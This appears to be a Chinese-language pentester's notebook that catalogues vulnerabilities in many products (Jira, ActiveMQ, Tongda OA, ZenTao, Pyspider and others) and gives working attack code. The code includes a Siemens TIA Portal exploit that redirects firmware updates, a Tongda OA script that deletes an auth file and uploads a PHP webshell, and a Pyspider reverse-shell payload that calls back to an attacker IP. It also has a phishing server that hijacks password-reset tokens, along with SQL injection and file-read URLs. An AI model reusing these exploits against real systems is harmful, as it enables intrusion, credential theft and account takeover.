未归类

子域名接管

https://github.com/m4ll0k/takeover

git proxy配置

https://www.jianshu.com/p/adf7cca269ac

jira

ssrf  CVE-2019-8451

url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/'

Jira未授权服务端模板注入远程代码执行漏洞（CVE-2019-11581）

Ueditor

任意文件上传

uchome

uchome 2.0 存在持久XSS漏洞
发布时间：2010-09-03
在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.
@import url(http://xxx.com/1.css); 包含远程css文件，可以在1.css中写入XSS利用.
分析代码 cp_theme.php 92行(17行调用)

Edge

Microsoft Edge 远程代码执行漏洞（CVE-2017-8619）

大华摄像头

未授权访问漏洞
受影响：
DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2

Exim邮件服务器

Exim deliver_message命令注入漏洞（CVE-2019-10149）

DeleGate　

DeleGate　DNS消息解压远程拒绝服务漏洞 CVE-2005-0036

ImageMagick

RCE
CVE-2016-3714

axis2

弱口令
任意文件读取

Awstats

路径泄露
http://www.xx.com.cn/cgi-bin/awstats.pl?config=xxx

ccs

注入

ISC BIND 

TSIG缓冲区溢出漏洞

拒绝服务漏洞(CVE-2014-8500)

拒绝服务漏洞(cnvd-2018-17514)

ISC BIND安全限制绕过漏洞(CVE-2017-3143)

HFS

RCE

PHP

PHP7 zip组件整型溢出漏洞(CVE-2016-3078) - > 可RCE - 影响范围是PHP 7.0.6版本以前的所有PHP 7.x 版本

 

phpmoadmin

RCE

node.js

node.js v8 debugger RCE

Elasticsearch

RCE
未授权访问
任意文件读取

OpenSSLDrown

OpenSSL 1.0.1 through
1.0.1g OpenSSL 1.0.0 through 1.0.0l all versions before OpenSSL 0.9.8y
DROWN攻击漏洞（CVE-2016-0800）

Openssh

libssh认证绕过（cve-2018-10933）
ibssh 0.8.x - 0.8.3
libssh 0.7.x - 0.7.5
libssh 0.6.x"    

Netgear

Netgear DGN1000B setup.cgi 远程命令注入漏洞

Bash

破壳漏洞（CVE-2014-6271）
影响：
影响目前主流的Linux和Mac OSX操作系统平台，包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台

Kubernetes

Kubernetes Kubernetes提权(CVE-2018-1002105)
Kubernetes v1.0.x-1.9.x Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11) 
Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5) Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3)

zabbix

latest sql注入漏洞
jsrpc sql注入漏洞

activemq

后台弱口令
RCE
任意文件上传
ActiveMQ物理路径泄漏

Fckeditor

https://www.jianshu.com/p/b0295978da77/fckeditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

http://x.com/goldpen/editor/filemanager/browser/default/  #泄露源码文件

上传漏洞
http://www.xx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html
访问进去直接上传图片格式木马。
http://www.xx.gov.cn/UploadFile/2.php;.gif

KingdEditor

XSS

上传漏洞

CuteEDitor

上传漏洞
编辑器Aspx版本
网上公布的CuteEditor漏洞，配合利用IIS 6.0解析漏洞获取Webshell
WAF防火墙免疫IIS6.0解析漏洞 -> 修改图片后缀绕过

Apache

Apache ActiveMQ 5.x ~ 5.14.0   
ActiveMQ任意文件文件移动漏洞

Apache ActiveMQ 5.13.0的版本之前的存在反序列化漏洞     
ActiveMQ反序列化漏洞(CVE-2015-5254)

Apache ActiveMQ5.14.0 – 5.15.2    
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)

apache mod_jk    apache mod_jk访问控制绕过漏洞（cve-2018-11759）

61616端口(ActiveMQ消息队列端口) 

hudson

代码泄露

grafana

弱口令

Openssh

CVE-2015-5600  
CVE-2016-6515  
CVE-2014-1692 
CVE-2010-4478
CVE-2016-10009  
CVE-2016-1908  
CVE-2015-8325  
CVE-2016-10012
CVE-2016-10010(提权）

Atlassian

CVE-2019-1158

docker

CVE-2018-15664

Siemens TIA Portal （STEP7）

RCE : CVE-2019-10915

##
# Exploit Title: Siemens TIA Portal remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
#  - Siemens STEP7 / TIA Portal
##

##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py 
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##

import websocket, ssl, argparse

parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host") 
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int) 
parser.add_argument("update_server", help="Malicious firmware update server IP") 
args = parser.parse_args()
  
host = args.target_host
port = args.target_port
updatesrv = args.update_server
ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\","USBDrivePath":"","downloadDestinationPath":"C:\Siemens\TIA Admin\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\Siemens\TIA Admin\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)

 WinRAR

CVE-2018-2025（WinRAR RCE）

影响范围：

WinRAR < 5.70 Beta 1

Bandizip    < = 6.2.0.0

好压(2345压缩)    < = 5.9.8.10907

360压缩    < = 4.0.0.1170

ghostscript

影响的版本 <= 9.23（全版本、全平台）

CVE-2017-8291

Ghostscript Ghostscript < 2017-04-26

 Flash

CVE-2018-4878

项目地址：https://github.com/Sch01ar/CVE-2018-4878.git

影响版本为：Adobe Flash Player <= 28.0.0.137

 Office

CVE-2017-11882（RCE）

漏洞影响版本：
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

vsftpd

vsftpd 2.3.4 - 笑脸漏洞
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set rhost IP
run

memcache

常用端口 11211
未授权访问

memcache     memcache drdos漏洞（ B6-2018-030102）
1.4.31    memcache     Memcached  Append/prepend 远程代码执行漏洞（CVE-2016-8704）
1.4.31    memcache     Memcache  Update 远程代码执行漏洞（CVE-2016-8705）
1.4.31    memcache     Memcache  SASL身份验证远程代码执行漏洞（CVE-2016-8706）

jenkins

常用端口 8080
未授权访问
反序列化
cve-2017-1000353
CVE-2018-1999002

GeoServer

1.弱口令

 Javascript is required to actually use the GeoServer admin console. - 网站没有添加到可信任站点

2.XXE（版本小于2.7.1.1）

 ccproxy

ccproxy6.0远程溢出

solr

未授权访问

CVE-2017-12629 XXE & RCE

CVE-2019-0193 RCE

Secure File Transfe

version <= 0.18
CVE-2015-2856
CVE-2015-2857 

version <= 0.20
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353

Kibana

Elasticsearch Kibana本地文件包含漏洞(CVE-2018-17246)

SCOoffice 

SCOoffice Server "STARTTLS"纯文本注入漏洞

LIVE555

LIVE555 RTSP服务器缓冲区溢出漏洞(CVE-2018-4013) -》 RCE

Ruby on Rails 

Ruby on Rails 路径穿越与任意文件读取(CVE-2019-5418)

Systemd

Systemd dns_packet_new函数堆缓冲区远程溢出漏洞 CVE-2017-9445
影响范围：
Systemd 版本223，该版本早于 2015 年 6 月，其后还包括 2017 年 3 月 发布的Systemd 版本 233

该漏洞影响 Ubuntu 17.04 版和 16.10 版 ; Debian 版本 Stretch（又名Debian 9），Buster（又名10）和 Sid（又名Unstable）; 以及使用 Systemd 的各种其他 Linux 发行版

D-Link 

D-Link DSL-2750B任意命令执行漏洞

金山安全套装

ksapi.sys对关键位置未保护，导致绕过限制

webTextbox编辑器

cookie欺骗

WebEditor

任意文件上传
http://nel.xx.com//main/model/newsoperation/webEditor/eWebEditor.jsp

GPON路由器

验证绕过漏洞(CVE-2018-10561)
命令注入漏洞(CVE-2018-10562)

Advantech Studio

Advantech Studio NTWebServer任意文件访问漏洞
受影响：
Advantech Advantech Studio 7.0

Nexus

CVE-2019-7238
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositioryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":10}

 通达OA

2013-2017-SQLI

http[s]://TongDaOA.domain/module/crm2010/imageOperation/deleteImage.php 
http[s]://TongDaOA.domain/module/crm2010/product/type_tree.php 
http[s]://TongDaOA.domain/module/crm2010/select/getData.php 
http[s]://TongDaOA.domain/module/crm2010/select/getValue.php 
http[s]://TongDaOA.domain/module/crm2010/select/index.php 
http[s]://TongDaOA.domain/module/crm2010/share/update.php 
http[s]://TongDaOA.domain/portal/webportals/source/oa/news.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/notify.php?LOGIN_USER_ID=
http[s]://TongDaOA.domain/task/crm/account_care_remind.php
http[s]://TongDaOA.domain/task/crm/action_link_remind.php
http[s]://TongDaOA.domain/task/crm/contract_birthday_remind.php
http[s]://TongDaOA.domain/task/crm/contract_near_remind.php
http[s]://TongDaOA.domain/task/crm/contract_remind.php
http[s]://TongDaOA.domain/task/crm/crm_account_contact_bir_remind.php
http[s]://TongDaOA.domain/task/crm/crm_complain_remind.php
http[s]://TongDaOA.domain/task/crm/crm_opportunity_status_remind.php
http[s]://TongDaOA.domain/task/crm/crm_salepay_remind.php
http[s]://TongDaOA.domain/task/crm/crm_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/marketing_near_remind.php
http[s]://TongDaOA.domain/task/crm/order_to_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/payment_near_remind.php
http[s]://TongDaOA.domain/task/crm/storage_near_remind.php
http[s]://TongDaOA.domain/ispirit/myoa.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php

V11

http[s]://TongDaOA.domain/general/approve_center/list/roll_config.inc.php
http[s]://TongDaOA.domain/general/bi_design/reportshop/report_bi.func.php
http[s]://TongDaOA.domain/general/data_center/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/data_center/model_design/design/report/action.php
http[s]://TongDaOA.domain/general/reportshop/design/report/action.php
http[s]://TongDaOA.domain/general/project/portal/details/budget/table.php
http[s]://TongDaOA.domain/general/reportshop/design/report/console/autocode/autocode.php
http[s]://TongDaOA.domain/general/reportshop/workshop/report/attachment-remark/form3.php
http[s]://TongDaOA.domain/general/system/user/get_key_user_info.php
http[s]://TongDaOA.domain/general/workflow/list/roll_config.inc.php
http[s]://TongDaOA.domain/interface/GetNewAPP.php
http[s]://TongDaOA.domain/interface/GetNewAPP1.php
http[s]://TongDaOA.domain/general/workflow/plugin/turn/kd_k3_applly/kd_k3_applly.php
http[s]://TongDaOA.domain/general/workflow/document_list/roll_config.inc.php

http[s]://TongDaOA.domain/inc/expired.php 判断通达版本
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
GET 参数username、email 可爆用户、邮箱
http[s]://TongDaOA.domain/resque/worker.php 计算机名

文件删除-》文件上传-》rce.py (V11.6)

import requests
target="Host"
payload="<?php eval($_REQUEST['a']);?>"
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('test.php', payload)}
requests.post(url=url,files=files)
url=target+"/_test.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

源天OA

RCE
http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27

禅道

禅道 11.6.2
越权
http://127.0.0.1/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin
注入
http://127.0.0.1/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
任意文件读取
http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd

RCE

类型:
SQL注入

影响范围:
禅道9版本

前置条件：
/module/api/model.php

payload:
/zentao/api-getModel-api-sql-sql=select+account+from+zt_user

Pyspider

未授权访问-》rce-poc

import IPy
import requests
import datetime
def check_fast(ip,port):
    '''
    fast check 
    check title only
    '''
    url="http://"+ip+":"+str(port)
    try:
        r=requests.get(url=url,timeout=1)
        if '''<a class="btn btn-default btn-info" href='/tasks' target=_blank>Recent Active Tasks</a>''' in r.text:
            return True
    except Exception:
        return False
    return False
def check_accurate(ip,port):
    '''
    accurate check
    check if python script can be executed
    '''
    url="http://"+ip+":"+str(port)+"/debug/pyspidervulntest/run"
    headers={"Content-Type": "application/x-www-form-urlencoded"}
    data='''
    webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
    '''
    try:
        r=requests.post(url=url,data=data,headers=headers,timeout=1)
        if  '"logs": "pyspidervulnerable\n"' in r.text:
            return True
    except Exception:
        return False
    return False
def main():
    print("Pyspider 未授权访问批量扫描器")
    print("本扫描器仅供希望检查自己网络的安全性的管理员使用")
    print("[1]精准扫描")
    print("[2]快速扫描")
    opt=input("选择扫描模式:")
    if str(opt).strip()=="1":
        scan_func=check_accurate
    else:
        scan_func=check_fast
    ipstart=int(IPy.IP(str(input("请输入起始ip:"))).strHex(),16)
    ipstop=int(IPy.IP(str(input("请输入结束ip:"))).strHex(),16)
    f=open("result.txt","a")
    f.write("pyspider未授权访问漏洞扫描报告
扫描时间:"+datetime.datetime.now().strftime('%Y-%m-%d')+"
存在漏洞的主机如下:
")
    count=0
    for ip in range(ipstart,ipstop+1):
        ip=str(IPy.IP(ip))
        if scan_func(ip,"5000"):
            print("x1b[31m"+"[-]",ip,"存在漏洞"+"x1b[39m")
            f.write(ip+"
")
            count+=1
        else:
            print("[*]",ip,"不存在漏洞")
    print("扫描完毕，共发现"+str(count)+"台主机存在漏洞") 
    f.write("扫描完毕，共发现"+str(count)+"台主机存在漏洞") 
    f.close()
    print("扫描结果已经存到result.txt")
if __name__ == "__main__":
   main()

exp

import requests
print("这是pyspider未授权访问的EXP，它能反弹shell,但由于本人VPS过期未能测试")
data='''
webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aimport+socket%0Aimport+os%0Aimport+sys%0Aimport+time%0Adef+test()%3A%0A++++hacker%3D%22192.168.0.144%22%0A++++port%3D1234%0A++++server%3D(hacker%2Cport)%0A++++s%3Dsocket.socket()%0A++++s.connect(server)%0A++++while+1%3A%0A++++++++dir%3Dos.getcwd()%0A++++++++s.send(dir.encode())%0A++++++++cmd%3Ds.recv(1024).decode()%0A++++++++if+cmd%3D%3D%22exit%22%3A%0A++++++++++++exit%0A++++++++elif+cmd.startswith(%22cd%22)%3A%0A++++++++++++os.chdir(cmd%5B2%3A%5D.strip())%0A++++++++++++result%3D%22Successfully+switched+directory!%22%0A++++++++else%3A%0A++++++++++++result%3Dos.popen(cmd).read()%0A++++++++if+not+result%3A%0A++++++++++++result%3D%22Command+Execution+Completed!%22%0A++++++++s.send(result.encode())%0A++++++++time.sleep(1)%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++exec(test())&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
'''
target=input("pyspider的URL:")
ip=input("你的ip:")
port=str(input("你的端口:"))
data=data.replace("192.168.0.144",ip).replace("1234",port)
headers={"Content-Type": "application/x-www-form-urlencoded"}
url=target+"/debug/pyspidervulntest/run"
try:
    requests.post(url=url,data=data,headers=headers,timeout=1)
except Exception:
    pass
print("已经发送paylaod请检查是否有shell弹回")

URP综合教务系统

任意密码重置

from flask import Flask,request,redirect
import requests
import _thread 

LPORT=1234 #本地端口
HOST="XXX.edu.cn" #教务系统地址
PROTOCOL="http" #教务系统是http还是https
PASSWORD="AAAbbb111!!!" #想把密码改成什么
proxies={"http":"http://127.0.0.1:8081"}
proxies=None #代理设置

def disablelogs():
    import logging
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)


def resetpassword(sid,id):
    print("[*]开始重置密码")
    url="{PROTOCOL}://{HOST}/forgetPassword/modifyPassword?sid={sid}&id={id}".format(PROTOCOL=PROTOCOL,HOST=HOST,sid=sid,id=id)
    #print(url)
    r=requests.get(url=url,proxies=proxies)
    page=r.text
    cookies=r.cookies
    try:
        tokenValue=page.split('tokenValue" value="')[1].split('"/>')[0]
    except Exception:
        print("[-]获取tokenValue失败")
        return 
    print("[+]获取到tokenValue:",tokenValue)

    url="{PROTOCOL}://{HOST}/forgetPassword/modifyResult".format(PROTOCOL=PROTOCOL,HOST=HOST)
    data={"tokenValue":tokenValue,"id":id,"sid":sid,"password":PASSWORD,"password1":PASSWORD}
    page=requests.post(url=url,data=data,proxies=proxies,cookies=cookies).text
    if "密码修改成功" in page:
        print("[+]密码重置成功")
    else:
        print("[-]出现错误，密码重置失败")



app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def process(path):
    sid=str(request.args.get("sid"))
    id=str(request.args.get("id"))
    #如果当前的URL中获取不到sid或者id，或者获取到的有问题就返回错误
    if not (id and sid and "forgetPassword/modifyPassword" in path):
        return "invalid access"
    try:
        int(id)
        print("当前id",id)
    except Exception:
        return "invalid access"

    print("[+]获取到密码重置token sid="+sid," id="+id)
    #开一个线程去重置密码
    _thread.start_new_thread(resetpassword,(sid,id))
    #返回笔者精心挑选的罗小黑的图片，降低受害者警惕程度
    return  redirect("https://s2.ax1x.com/2020/01/08/l2QaSs.jpg")


if __name__ == '__main__':
    disablelogs()
    print("[*]开启服务中")
    app.run(port=LPORT)

http[s]://TongDaOA.domain/module/crm2010/imageOperation/deleteImage.php 
http[s]://TongDaOA.domain/module/crm2010/product/type_tree.php 
http[s]://TongDaOA.domain/module/crm2010/select/getData.php 
http[s]://TongDaOA.domain/module/crm2010/select/getValue.php 
http[s]://TongDaOA.domain/module/crm2010/select/index.php 
http[s]://TongDaOA.domain/module/crm2010/share/update.php 
http[s]://TongDaOA.domain/portal/webportals/source/oa/news.php
http[s]://TongDaOA.domain/portal/webportals/source/oa/notify.php?LOGIN_USER_ID=
http[s]://TongDaOA.domain/task/crm/account_care_remind.php
http[s]://TongDaOA.domain/task/crm/action_link_remind.php
http[s]://TongDaOA.domain/task/crm/contract_birthday_remind.php
http[s]://TongDaOA.domain/task/crm/contract_near_remind.php
http[s]://TongDaOA.domain/task/crm/contract_remind.php
http[s]://TongDaOA.domain/task/crm/crm_account_contact_bir_remind.php
http[s]://TongDaOA.domain/task/crm/crm_complain_remind.php
http[s]://TongDaOA.domain/task/crm/crm_opportunity_status_remind.php
http[s]://TongDaOA.domain/task/crm/crm_salepay_remind.php
http[s]://TongDaOA.domain/task/crm/crm_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/marketing_near_remind.php
http[s]://TongDaOA.domain/task/crm/order_to_stockout_remind.php
http[s]://TongDaOA.domain/task/crm/payment_near_remind.php
http[s]://TongDaOA.domain/task/crm/storage_near_remind.php
http[s]://TongDaOA.domain/ispirit/myoa.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php